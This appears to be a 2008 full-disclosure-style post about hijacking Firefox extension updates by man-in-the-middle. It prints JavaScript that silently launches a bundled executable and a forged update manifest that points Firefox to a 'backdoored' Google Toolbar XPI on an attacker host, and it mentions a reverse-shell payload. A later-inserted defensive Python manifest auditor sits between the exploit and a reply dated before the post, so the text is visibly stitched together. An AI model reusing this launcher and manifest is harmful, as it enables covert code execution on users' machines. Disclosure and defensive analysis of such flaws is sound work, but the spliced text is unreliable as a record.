Firefox advisory MD5 hash : 1A0E6F146C273A1D7513392A1DEB12F0
Ferruh Mavituna - 12.02.2008
http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0535.html
Very good and detailed advisory,
I came up with the same issue about one month ago and developed two PoCs.
Here is the hash: http://ferruh.mavituna.com/makale/firefox-hash/ (shame on
me that I haven't sent it to any public mailing list. If you're really curious, check
out RSS caches and Google cache) and a brief explanation is in the attachment
(Firefox-MITM.txt).
I attached the Google Toolbar PoC. Be careful, it's throwing a reverse shell. Also,
I got a PoC for Linux as well.
To clarify things, you can execute arbitrary code with the current user's
rights.
Here is some sample code,
--------------------
// Build the path to the svchost.exe shipped inside the installed extension's chrome directory
// (XPCOM contract IDs restored with their leading "@", which the mail archive dropped)
var exepath = Components.classes["@mozilla.org/file/directory_service;1"]
    .getService(Components.interfaces.nsIProperties)
    .get("ProfD", Components.interfaces.nsIFile).path +
    "\\extensions\\{3112ca9c-de6d-4884-a869-9855de68056c}\\chrome\\svchost.exe";
runFile(exepath);

function runFile(f) {
    // Wrap the path in an nsILocalFile and hand it to nsIProcess
    var file = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(f);
    var process = Components.classes["@mozilla.org/process/util;1"]
        .createInstance(Components.interfaces.nsIProcess);
    process.init(file);
    var args = [""];
    process.run(false, args, args.length);  // non-blocking launch
}
--------------------
Sample update response XML,
----------
<?xml version="1.0"?>
<RDF:RDF xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}">
    <em:updates><RDF:Seq>
      <RDF:li resource="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16"/>
    </RDF:Seq></em:updates>
  </RDF:Description>
  <RDF:Description about="urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16">
    <em:version>4.0.0.16</em:version>
    <em:targetApplication><RDF:Description>
      <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
      <em:minVersion>1.5.0</em:minVersion>
      <em:maxVersion>2.9.99</em:maxVersion>
      <em:updateLink>http://192.168.1.130/firefox/google.xpi</em:updateLink>
    </RDF:Description></em:targetApplication>
  </RDF:Description>
</RDF:RDF>
----------
This is our backdoored XPI file URL:
http://192.168.1.130/firefox/google.xpi
I modified google-toolbar.xul and added code to run the svchost.exe file, which is
in the XPI file as well.
A sample XPI file is attached, a modified version of the Google Toolbar extension, and
it will work every time you launch Firefox.
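A defender-side check for the weakness the post describes, added here as an example and not part of the original post: it parses an update manifest in the RDF format shown above and flags every update entry whose updateLink is not served over HTTPS or which carries no em:updateHash (the XPI hash element Firefox 3 added to the manifest format), either of which leaves the package swappable on the wire. The sample manifest is constructed from the one in the post; the function name and finding strings are this example's own.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RDF = "{http://www.w3.org/1999/02/22-rdf-syntax-ns#}"
EM = "{http://www.mozilla.org/2004/em-rdf#}"
# Constructed sample: the manifest from the post above (plain-HTTP link, no hash).
EXT = "urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}"
SAMPLE_RDF = f"""<?xml version="1.0"?>
<RDF:RDF xmlns:RDF="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns:em="http://www.mozilla.org/2004/em-rdf#">
 <RDF:Description about="{EXT}">
  <em:updates><RDF:Seq><RDF:li resource="{EXT}:4.0.0.16"/></RDF:Seq></em:updates>
 </RDF:Description>
 <RDF:Description about="{EXT}:4.0.0.16">
  <em:version>4.0.0.16</em:version>
  <em:targetApplication><RDF:Description>
   <em:id>{{ec8030f7-c20a-464f-9b0e-13a3a9e97384}}</em:id>
   <em:minVersion>1.5.0</em:minVersion><em:maxVersion>2.9.99</em:maxVersion>
   <em:updateLink>http://192.168.1.130/firefox/google.xpi</em:updateLink>
  </RDF:Description></em:targetApplication>
 </RDF:Description>
</RDF:RDF>"""

def audit_update_manifest(xml_text):
    """Return [(version, updateLink, findings)] per update entry; a finding
    means an on-path attacker could substitute the XPI unnoticed."""
    root = ET.fromstring(xml_text)
    by_about = {}  # top-level Description elements keyed by their 'about' URN
    for d in root.iter(RDF + "Description"):
        about = d.get("about") or d.get(RDF + "about")
        if about:
            by_about[about] = d
    results = []
    for li in root.iter(RDF + "li"):  # each RDF:li in em:updates names one entry
        entry = by_about.get(li.get("resource") or li.get(RDF + "resource"))
        if entry is None:
            continue
        version = entry.findtext(EM + "version")
        for target in entry.iter(EM + "targetApplication"):
            link = target.findtext(".//" + EM + "updateLink") or ""
            findings = []
            if urlparse(link).scheme != "https":
                findings.append("updateLink not served over HTTPS")
            if target.find(".//" + EM + "updateHash") is None:
                findings.append("no em:updateHash for the XPI")
            results.append((version, link, findings))
    return results
```

Running it on the sample reports both findings for version 4.0.0.16; a manifest with an HTTPS link and an em:updateHash element comes back clean.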
SW - 21.05.2007
Ah, that's the way; it's enough if you just pay as much attention to their security as the company itself does!
